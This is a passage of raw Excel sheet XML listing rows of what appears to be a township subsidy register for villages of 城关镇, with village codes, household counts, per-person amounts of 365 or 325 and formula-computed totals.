    <row r="485" customHeight="1" spans="1:11">
      <c r="A485" s="23" t="s">
        <v>1388</v>
      </c>
      <c r="B485" s="24" t="str">
        <f>B484</f>
        <v>城关镇</v>
      </c>
      <c r="C485" s="24" t="str">
        <f>C484</f>
        <v>北外村</v>
      </c>
      <c r="D485" s="23" t="s">
        <v>1389</v>
      </c>
      <c r="E485" s="23" t="s">
        <v>1390</v>
      </c>
      <c r="F485" s="24" t="str">
        <f>F484</f>
        <v>4113210102</v>
      </c>
      <c r="G485" s="24"/>
      <c r="H485" s="24"/>
      <c r="I485" s="24">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="J485" s="24"/>
      <c r="K485" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="486" customHeight="1" spans="1:11">
      <c r="A486" s="23" t="s">
        <v>1391</v>
      </c>
      <c r="B486" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C486" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D486" s="24" t="s">
        <v>1392</v>
      </c>
      <c r="E486" s="24" t="s">
        <v>697</v>
      </c>
      <c r="F486" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G486" s="24">
        <v>2</v>
      </c>
      <c r="H486" s="25">
        <v>325</v>
      </c>
      <c r="I486" s="24">
        <f t="shared" si="7"/>
        <v>650</v>
      </c>
      <c r="J486" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K486" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="487" customHeight="1" spans="1:11">
      <c r="A487" s="23" t="s">
        <v>1393</v>
      </c>
      <c r="B487" s="24" t="str">
        <f>B486</f>
        <v>城关镇</v>
      </c>
      <c r="C487" s="24" t="str">
        <f>C486</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D487" s="23" t="s">
        <v>1394</v>
      </c>
      <c r="E487" s="23" t="s">
        <v>519</v>
      </c>
      <c r="F487" s="24" t="str">
        <f>F486</f>
        <v>4113210103</v>
      </c>
      <c r="G487" s="24"/>
      <c r="H487" s="24"/>
      <c r="I487" s="24">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="J487" s="24"/>
      <c r="K487" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="488" customHeight="1" spans="1:11">
      <c r="A488" s="23" t="s">
        <v>1395</v>
      </c>
      <c r="B488" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C488" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D488" s="24" t="s">
        <v>1396</v>
      </c>
      <c r="E488" s="24" t="s">
        <v>281</v>
      </c>
      <c r="F488" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G488" s="24">
        <v>1</v>
      </c>
      <c r="H488" s="25">
        <v>365</v>
      </c>
      <c r="I488" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J488" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K488" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="489" customHeight="1" spans="1:11">
      <c r="A489" s="23" t="s">
        <v>1397</v>
      </c>
      <c r="B489" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C489" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D489" s="24" t="s">
        <v>1398</v>
      </c>
      <c r="E489" s="24" t="s">
        <v>543</v>
      </c>
      <c r="F489" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G489" s="24">
        <v>1</v>
      </c>
      <c r="H489" s="25">
        <v>365</v>
      </c>
      <c r="I489" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J489" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K489" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="490" customHeight="1" spans="1:11">
      <c r="A490" s="23" t="s">
        <v>1399</v>
      </c>
      <c r="B490" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C490" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D490" s="24" t="s">
        <v>1400</v>
      </c>
      <c r="E490" s="24" t="s">
        <v>382</v>
      </c>
      <c r="F490" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G490" s="24">
        <v>1</v>
      </c>
      <c r="H490" s="25">
        <v>365</v>
      </c>
      <c r="I490" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J490" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K490" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="491" customHeight="1" spans="1:11">
      <c r="A491" s="23" t="s">
        <v>1401</v>
      </c>
      <c r="B491" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C491" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D491" s="24" t="s">
        <v>1402</v>
      </c>
      <c r="E491" s="24" t="s">
        <v>1403</v>
      </c>
      <c r="F491" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G491" s="24">
        <v>1</v>
      </c>
      <c r="H491" s="25">
        <v>365</v>
      </c>
      <c r="I491" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J491" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K491" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="492" customHeight="1" spans="1:11">
      <c r="A492" s="23" t="s">
        <v>1404</v>
      </c>
      <c r="B492" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C492" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D492" s="24" t="s">
        <v>1405</v>
      </c>
      <c r="E492" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F492" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G492" s="24">
        <v>2</v>
      </c>
      <c r="H492" s="25">
        <v>325</v>
      </c>
      <c r="I492" s="24">
        <f t="shared" si="7"/>
        <v>650</v>
      </c>
      <c r="J492" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K492" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="493" customHeight="1" spans="1:11">
      <c r="A493" s="23" t="s">
        <v>1406</v>
      </c>
      <c r="B493" s="24" t="str">
        <f>B492</f>
        <v>城关镇</v>
      </c>
      <c r="C493" s="24" t="str">
        <f>C492</f>
        <v>城关镇北外村</v>
      </c>
      <c r="D493" s="23" t="s">
        <v>1407</v>
      </c>
      <c r="E493" s="23" t="s">
        <v>222</v>
      </c>
      <c r="F493" s="24" t="str">
        <f>F492</f>
        <v>4113210102</v>
      </c>
      <c r="G493" s="24"/>
      <c r="H493" s="24"/>
      <c r="I493" s="24">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="J493" s="24"/>
      <c r="K493" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="494" customHeight="1" spans="1:11">
      <c r="A494" s="23" t="s">
        <v>1408</v>
      </c>
      <c r="B494" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C494" s="24" t="s">
        <v>1409</v>
      </c>
      <c r="D494" s="24" t="s">
        <v>1410</v>
      </c>
      <c r="E494" s="24" t="s">
        <v>303</v>
      </c>
      <c r="F494" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G494" s="24">
        <v>1</v>
      </c>
      <c r="H494" s="25">
        <v>365</v>
      </c>
      <c r="I494" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J494" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K494" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="495" customHeight="1" spans="1:11">
      <c r="A495" s="23" t="s">
        <v>1411</v>
      </c>
      <c r="B495" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C495" s="24" t="s">
        <v>1409</v>
      </c>
      <c r="D495" s="24" t="s">
        <v>1412</v>
      </c>
      <c r="E495" s="24" t="s">
        <v>1413</v>
      </c>
      <c r="F495" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G495" s="24">
        <v>1</v>
      </c>
      <c r="H495" s="25">
        <v>365</v>
      </c>
      <c r="I495" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J495" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K495" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="496" customHeight="1" spans="1:11">
      <c r="A496" s="23" t="s">
        <v>1414</v>
      </c>
      <c r="B496" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C496" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D496" s="24" t="s">
        <v>1415</v>
      </c>
      <c r="E496" s="24" t="s">
        <v>312</v>
      </c>
      <c r="F496" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G496" s="24">
        <v>1</v>
      </c>
      <c r="H496" s="25">
        <v>365</v>
      </c>
      <c r="I496" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J496" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K496" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="497" customHeight="1" spans="1:11">
      <c r="A497" s="23" t="s">
        <v>1416</v>
      </c>
      <c r="B497" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C497" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D497" s="24" t="s">
        <v>1417</v>
      </c>
      <c r="E497" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F497" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G497" s="24">
        <v>1</v>
      </c>
      <c r="H497" s="25">
        <v>365</v>
      </c>
      <c r="I497" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J497" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K497" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="498" customHeight="1" spans="1:11">
      <c r="A498" s="23" t="s">
        <v>1418</v>
      </c>
      <c r="B498" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C498" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D498" s="24" t="s">
        <v>1419</v>
      </c>
      <c r="E498" s="24" t="s">
        <v>627</v>
      </c>
      <c r="F498" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G498" s="24">
        <v>1</v>
      </c>
      <c r="H498" s="25">
        <v>365</v>
      </c>
      <c r="I498" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J498" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K498" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="499" customHeight="1" spans="1:11">
      <c r="A499" s="23" t="s">
        <v>1420</v>
      </c>
      <c r="B499" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C499" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D499" s="24" t="s">
        <v>1421</v>
      </c>
      <c r="E499" s="24" t="s">
        <v>303</v>
      </c>
      <c r="F499" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G499" s="24">
        <v>2</v>
      </c>
      <c r="H499" s="25">
        <v>325</v>
      </c>
      <c r="I499" s="24">
        <f t="shared" si="7"/>
        <v>650</v>
      </c>
      <c r="J499" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K499" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="500" customHeight="1" spans="1:11">
      <c r="A500" s="23" t="s">
        <v>1422</v>
      </c>
      <c r="B500" s="24" t="str">
        <f>B499</f>
        <v>城关镇</v>
      </c>
      <c r="C500" s="24" t="str">
        <f>C499</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D500" s="23" t="s">
        <v>1423</v>
      </c>
      <c r="E500" s="23" t="s">
        <v>479</v>
      </c>
      <c r="F500" s="24" t="str">
        <f>F499</f>
        <v>4113210108</v>
      </c>
      <c r="G500" s="24"/>
      <c r="H500" s="24"/>
      <c r="I500" s="24">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="J500" s="24"/>
      <c r="K500" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="501" customHeight="1" spans="1:11">
      <c r="A501" s="23" t="s">
        <v>1424</v>
      </c>
      <c r="B501" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C501" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D501" s="24" t="s">
        <v>1425</v>
      </c>
      <c r="E501" s="24" t="s">
        <v>382</v>
      </c>
      <c r="F501" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G501" s="24">
        <v>1</v>
      </c>
      <c r="H501" s="25">
        <v>365</v>
      </c>
      <c r="I501" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J501" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K501" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="502" customHeight="1" spans="1:11">
      <c r="A502" s="23" t="s">
        <v>1426</v>
      </c>
      <c r="B502" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C502" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D502" s="24" t="s">
        <v>1427</v>
      </c>
      <c r="E502" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F502" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G502" s="24">
        <v>1</v>
      </c>
      <c r="H502" s="25">
        <v>365</v>
      </c>
      <c r="I502" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J502" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K502" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="503" customHeight="1" spans="1:11">
      <c r="A503" s="23" t="s">
        <v>1428</v>
      </c>
      <c r="B503" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C503" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D503" s="24" t="s">
        <v>1429</v>
      </c>
      <c r="E503" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F503" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G503" s="24">
        <v>1</v>
      </c>
      <c r="H503" s="25">
        <v>365</v>
      </c>
      <c r="I503" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J503" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K503" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="504" customHeight="1" spans="1:11">
      <c r="A504" s="23" t="s">
        <v>1430</v>
      </c>
      <c r="B504" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C504" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D504" s="24" t="s">
        <v>1431</v>
      </c>
      <c r="E504" s="24" t="s">
        <v>258</v>
      </c>
      <c r="F504" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G504" s="24">
        <v>1</v>
      </c>
      <c r="H504" s="25">
        <v>365</v>
      </c>
      <c r="I504" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J504" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K504" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="505" customHeight="1" spans="1:11">
      <c r="A505" s="23" t="s">
        <v>1432</v>
      </c>
      <c r="B505" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C505" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D505" s="24" t="s">
        <v>1433</v>
      </c>
      <c r="E505" s="24" t="s">
        <v>258</v>
      </c>
      <c r="F505" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G505" s="24">
        <v>1</v>
      </c>
      <c r="H505" s="25">
        <v>365</v>
      </c>
      <c r="I505" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J505" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K505" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="506" customHeight="1" spans="1:11">
      <c r="A506" s="23" t="s">
        <v>1434</v>
      </c>
      <c r="B506" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C506" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D506" s="24" t="s">
        <v>1435</v>
      </c>
      <c r="E506" s="24" t="s">
        <v>416</v>
      </c>
      <c r="F506" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G506" s="24">
        <v>1</v>
      </c>
      <c r="H506" s="25">
        <v>365</v>
      </c>
      <c r="I506" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J506" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K506" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="507" customHeight="1" spans="1:11">
      <c r="A507" s="23" t="s">
        <v>1436</v>
      </c>
      <c r="B507" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C507" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D507" s="24" t="s">
        <v>1437</v>
      </c>
      <c r="E507" s="24" t="s">
        <v>273</v>
      </c>
      <c r="F507" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G507" s="24">
        <v>1</v>
      </c>
      <c r="H507" s="25">
        <v>365</v>
      </c>
      <c r="I507" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J507" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K507" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="508" customHeight="1" spans="1:11">
      <c r="A508" s="23" t="s">
        <v>1438</v>
      </c>
      <c r="B508" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C508" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D508" s="24" t="s">
        <v>1439</v>
      </c>
      <c r="E508" s="24" t="s">
        <v>915</v>
      </c>
      <c r="F508" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G508" s="24">
        <v>2</v>
      </c>
      <c r="H508" s="25">
        <v>325</v>
      </c>
      <c r="I508" s="24">
        <f t="shared" si="7"/>
        <v>650</v>
      </c>
      <c r="J508" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K508" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="509" customHeight="1" spans="1:11">
      <c r="A509" s="23" t="s">
        <v>1440</v>
      </c>
      <c r="B509" s="24" t="str">
        <f>B508</f>
        <v>城关镇</v>
      </c>
      <c r="C509" s="24" t="str">
        <f>C508</f>
        <v>城关镇西北村</v>
      </c>
      <c r="D509" s="23" t="s">
        <v>1441</v>
      </c>
      <c r="E509" s="23" t="s">
        <v>540</v>
      </c>
      <c r="F509" s="24" t="str">
        <f>F508</f>
        <v>4113210106</v>
      </c>
      <c r="G509" s="24"/>
      <c r="H509" s="24"/>
      <c r="I509" s="24">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="J509" s="24"/>
      <c r="K509" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="510" customHeight="1" spans="1:11">
      <c r="A510" s="23" t="s">
        <v>1442</v>
      </c>
      <c r="B510" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C510" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D510" s="24" t="s">
        <v>1443</v>
      </c>
      <c r="E510" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F510" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G510" s="24">
        <v>1</v>
      </c>
      <c r="H510" s="25">
        <v>365</v>
      </c>
      <c r="I510" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J510" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K510" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="511" customHeight="1" spans="1:11">
      <c r="A511" s="23" t="s">
        <v>1444</v>
      </c>
      <c r="B511" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C511" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D511" s="24" t="s">
        <v>1445</v>
      </c>
      <c r="E511" s="24" t="s">
        <v>1446</v>
      </c>
      <c r="F511" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G511" s="24">
        <v>1</v>
      </c>
      <c r="H511" s="25">
        <v>365</v>
      </c>
      <c r="I511" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J511" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K511" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="512" customHeight="1" spans="1:11">
      <c r="A512" s="23" t="s">
        <v>1447</v>
      </c>
      <c r="B512" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C512" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D512" s="24" t="s">
        <v>1448</v>
      </c>
      <c r="E512" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F512" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G512" s="24">
        <v>1</v>
      </c>
      <c r="H512" s="25">
        <v>365</v>
      </c>
      <c r="I512" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J512" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K512" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="513" customHeight="1" spans="1:11">
      <c r="A513" s="23" t="s">
        <v>1449</v>
      </c>
      <c r="B513" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C513" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D513" s="24" t="s">
        <v>1450</v>
      </c>
      <c r="E513" s="24" t="s">
        <v>1065</v>
      </c>
      <c r="F513" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G513" s="24">
        <v>2</v>
      </c>
      <c r="H513" s="25">
        <v>325</v>
      </c>
      <c r="I513" s="24">
        <f t="shared" si="7"/>
        <v>650</v>
      </c>
      <c r="J513" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K513" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="514" customHeight="1" spans="1:11">
      <c r="A514" s="23" t="s">
        <v>1451</v>
      </c>
      <c r="B514" s="24" t="str">
        <f>B513</f>
        <v>城关镇</v>
      </c>
      <c r="C514" s="24" t="str">
        <f>C513</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D514" s="24" t="s">
        <v>1452</v>
      </c>
      <c r="E514" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F514" s="24" t="str">
        <f>F513</f>
        <v>4113210103</v>
      </c>
      <c r="G514" s="24"/>
      <c r="H514" s="24"/>
      <c r="I514" s="24">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="J514" s="24"/>
      <c r="K514" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="515" customHeight="1" spans="1:11">
      <c r="A515" s="23" t="s">
        <v>1453</v>
      </c>
      <c r="B515" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C515" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D515" s="24" t="s">
        <v>1454</v>
      </c>
      <c r="E515" s="24" t="s">
        <v>435</v>
      </c>
      <c r="F515" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G515" s="24">
        <v>1</v>
      </c>
      <c r="H515" s="25">
        <v>365</v>
      </c>
      <c r="I515" s="24">
        <f t="shared" si="7"/>
        <v>365</v>
      </c>
      <c r="J515" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K515" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="516" customHeight="1" spans="1:11">
      <c r="A516" s="23" t="s">
        <v>1455</v>
      </c>
      <c r="B516" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C516" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D516" s="24" t="s">
        <v>1456</v>
      </c>
      <c r="E516" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F516" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G516" s="24">
        <v>1</v>
      </c>
      <c r="H516" s="25">
        <v>365</v>
      </c>
      <c r="I516" s="24">
        <f t="shared" ref="I516:I579" si="8">H516*G516</f>
        <v>365</v>
      </c>
      <c r="J516" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K516" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="517" customHeight="1" spans="1:11">
      <c r="A517" s="23" t="s">
        <v>1457</v>
      </c>
      <c r="B517" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C517" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D517" s="24" t="s">
        <v>1458</v>
      </c>
      <c r="E517" s="24" t="s">
        <v>1459</v>
      </c>
      <c r="F517" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G517" s="24">
        <v>1</v>
      </c>
      <c r="H517" s="25">
        <v>365</v>
      </c>
      <c r="I517" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J517" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K517" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="518" customHeight="1" spans="1:11">
      <c r="A518" s="23" t="s">
        <v>1460</v>
      </c>
      <c r="B518" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C518" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D518" s="24" t="s">
        <v>1461</v>
      </c>
      <c r="E518" s="24" t="s">
        <v>1462</v>
      </c>
      <c r="F518" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G518" s="24">
        <v>1</v>
      </c>
      <c r="H518" s="25">
        <v>365</v>
      </c>
      <c r="I518" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J518" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K518" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="519" customHeight="1" spans="1:11">
      <c r="A519" s="23" t="s">
        <v>1463</v>
      </c>
      <c r="B519" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C519" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D519" s="24" t="s">
        <v>1464</v>
      </c>
      <c r="E519" s="24" t="s">
        <v>1465</v>
      </c>
      <c r="F519" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G519" s="24">
        <v>2</v>
      </c>
      <c r="H519" s="25">
        <v>325</v>
      </c>
      <c r="I519" s="24">
        <f t="shared" si="8"/>
        <v>650</v>
      </c>
      <c r="J519" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K519" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="520" customHeight="1" spans="1:11">
      <c r="A520" s="23" t="s">
        <v>1466</v>
      </c>
      <c r="B520" s="24" t="str">
        <f>B519</f>
        <v>城关镇</v>
      </c>
      <c r="C520" s="24" t="str">
        <f>C519</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D520" s="23" t="s">
        <v>1467</v>
      </c>
      <c r="E520" s="23" t="s">
        <v>249</v>
      </c>
      <c r="F520" s="24" t="str">
        <f>F519</f>
        <v>4113210108</v>
      </c>
      <c r="G520" s="24"/>
      <c r="H520" s="24"/>
      <c r="I520" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J520" s="24"/>
      <c r="K520" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="521" customHeight="1" spans="1:11">
      <c r="A521" s="23" t="s">
        <v>1468</v>
      </c>
      <c r="B521" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C521" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D521" s="24" t="s">
        <v>1469</v>
      </c>
      <c r="E521" s="24" t="s">
        <v>232</v>
      </c>
      <c r="F521" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G521" s="24">
        <v>1</v>
      </c>
      <c r="H521" s="25">
        <v>365</v>
      </c>
      <c r="I521" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J521" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K521" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="522" customHeight="1" spans="1:11">
      <c r="A522" s="23" t="s">
        <v>1470</v>
      </c>
      <c r="B522" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C522" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D522" s="24" t="s">
        <v>1471</v>
      </c>
      <c r="E522" s="24" t="s">
        <v>1472</v>
      </c>
      <c r="F522" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G522" s="24">
        <v>1</v>
      </c>
      <c r="H522" s="25">
        <v>365</v>
      </c>
      <c r="I522" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J522" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K522" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="523" customHeight="1" spans="1:11">
      <c r="A523" s="23" t="s">
        <v>1473</v>
      </c>
      <c r="B523" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C523" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D523" s="24" t="s">
        <v>1474</v>
      </c>
      <c r="E523" s="24" t="s">
        <v>402</v>
      </c>
      <c r="F523" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G523" s="24">
        <v>1</v>
      </c>
      <c r="H523" s="25">
        <v>365</v>
      </c>
      <c r="I523" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J523" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K523" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="524" customHeight="1" spans="1:11">
      <c r="A524" s="23" t="s">
        <v>1475</v>
      </c>
      <c r="B524" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C524" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D524" s="24" t="s">
        <v>1476</v>
      </c>
      <c r="E524" s="24" t="s">
        <v>1477</v>
      </c>
      <c r="F524" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G524" s="24">
        <v>1</v>
      </c>
      <c r="H524" s="25">
        <v>365</v>
      </c>
      <c r="I524" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J524" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K524" s="24" t="s">
        <v>225</v>
      </c>
    </row>
